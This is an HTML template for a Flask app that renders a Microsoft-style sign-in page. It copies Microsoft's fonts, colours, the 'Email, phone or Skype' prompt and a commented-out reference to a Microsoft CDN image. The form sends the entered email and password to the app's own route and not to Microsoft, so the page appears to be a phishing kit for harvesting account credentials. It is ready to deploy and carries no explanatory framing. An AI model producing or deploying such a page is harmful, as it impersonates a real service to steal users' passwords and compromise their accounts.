<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>

    <div class="container">
        <div class="section">
            <br><br>
            <div class="logo">
                <img src="{{ url_for('static', filename='logo2.png') }}">
            </div>
            <h5>Sign in</h5>
            
            <form action="{{ url_for('one') }}" method="POST">
                <input class="email" type="email" name="email" placeholder="Email, phone or Skype" required><br>
                <input class="password" type="password" name="password" placeholder="Password" required><br>
                <input class="check" type="checkbox" name="remember" id=""><span>Keep me signed in</span><br><br>
                <p><a href="#" class="forgot">Forgot my password</a></p>
                <input class="submit" type="submit" value="Sign in">
            </form>
        </div>
    </div>
    <br><br><br><br><br>

    <!-- <button class="btn"><a  href="#"><img class="tile-img medium" src="https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg" alt=""> <span class="link">Sign-in options</span></a></button> -->



    <style>
        body{
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            background-color: #fff;
            font-family: "Segoe UI Webfont", -apple-system, "Helvetica Neue", "Lucida Grande", "Roboto", "Ebrima", "Nirmala UI", "Gadugi", "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", "Tunga", "Lao UI", "Raavi", "Iskoola Pota", "Latha", "Leelawadee", "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math";;
        }

        .container{
            /* border: 1px solid red; */
            margin: 0 auto;
            width: 500px;
            height: 500px;
            margin-top: 100px;
            box-shadow: rgba(60, 64, 67, 0.3) 0px 1px 2px 0px, rgba(60, 64, 67, 0.15) 0px 1px 3px 1px;
        }

        .section{
            margin-left: 25px;
            margin-bottom: -50px;
        }

        img{
            margin-right: 90px;
            /* border: 1px solid red; */
            height: 60px;
            margin-left: 15px;
            /* margin-top: -25px; */
        }

        h5{
            font-family: "Segoe UI", "Helvetica Neue", "Lucida Grande", "Roboto", "Ebrima", "Nirmala UI", "Gadugi", "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", "Tunga", "Lao UI", "Raavi", "Iskoola Pota", "Latha", "Leelawadee", "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math";
            color: #1b1b1b;
            font-size: 1.5rem;
            font-weight: 600;
            margin-top: -10px;
            margin-left: 22px;
           
        }

        .forgot{
            font-size: 15px;
            color: #0067b8;
        }

        .email {
    padding-bottom: 10px;
    border: (0, 0, 0, 0.8);
   
    margin-left: 22px;
    margin-top: -20px;
    border: 1px solid black;    
    border-top: none;
    border-left: none;
    border-right: none;
    width: 400px;
    font-size: inherit;
    position: absolute;
    font-family: inherit;
}

    .password{
        padding-bottom: 10px;
    border: (0, 0, 0, 0.8);
    border: 1px solid black;    
    border-top: none;
    border-left: none;
    border-right: none;
    margin-left: 22px;
    margin-top: 50px;
    width: 400px;
    font-size: inherit;

    font-family: inherit;
    }

    .password:focus{
        outline: none; /* Remove the default focus outline */
        border-bottom: 1px solid #0067b8; /* Add bottom border when focused */

    }

.email:focus {
    outline: none; /* Remove the default focus outline */
    border-bottom: 1px solid #0067b8; /* Add bottom border when focused */
}
        .check{
            margin-left: 22px;
            margin-top: 20px;
            font-size: 14px;
            width: 20px; 
            height: 20px;
        }

        span{
            margin-top: -10px;
            font-size: 18px;
        }

        p{
            margin-left: 22px;
            font-size: 14px;
        }
        a{
            text-decoration: none;
            color: #0067b8;
            font-size: .8125rem;;
        }

        .submit{
            font-family: inherit;
            font-size: inherit;
            color: #fff;
            border-color: #0067b8;
            background-color: #0067b8;
            padding: 10px 38px;
            border: none;
            float: right;
            margin-right: 50px;
            margin-top: 15px;
            cursor: pointer;
        }

        .submit:hover{
            background-color: #005da0;
        }

        .tile-img.medium {
        width: 32px;
        height: 32px;
        padding-right: 280px;
        }

        .btn{
            margin-left: 22px; 
            width: 360px;
            background-color: white;
            border: 1px solid rgb(175, 175, 175);
            height: 48px;
        }

         .link{
            font-size: .8125rem;;
            font-family: "Segoe UI", "Helvetica Neue", "Lucida Grande", "Roboto", "Ebrima", "Nirmala UI", "Gadugi", "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", "Tunga", "Lao UI", "Raavi", "Iskoola Pota", "Latha", "Leelawadee", "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math";
            color: #1b1b1b;
            margin-top: -28px;
            margin-left: -110px;
            position: absolute;
        }
    </style>
</body>
</html>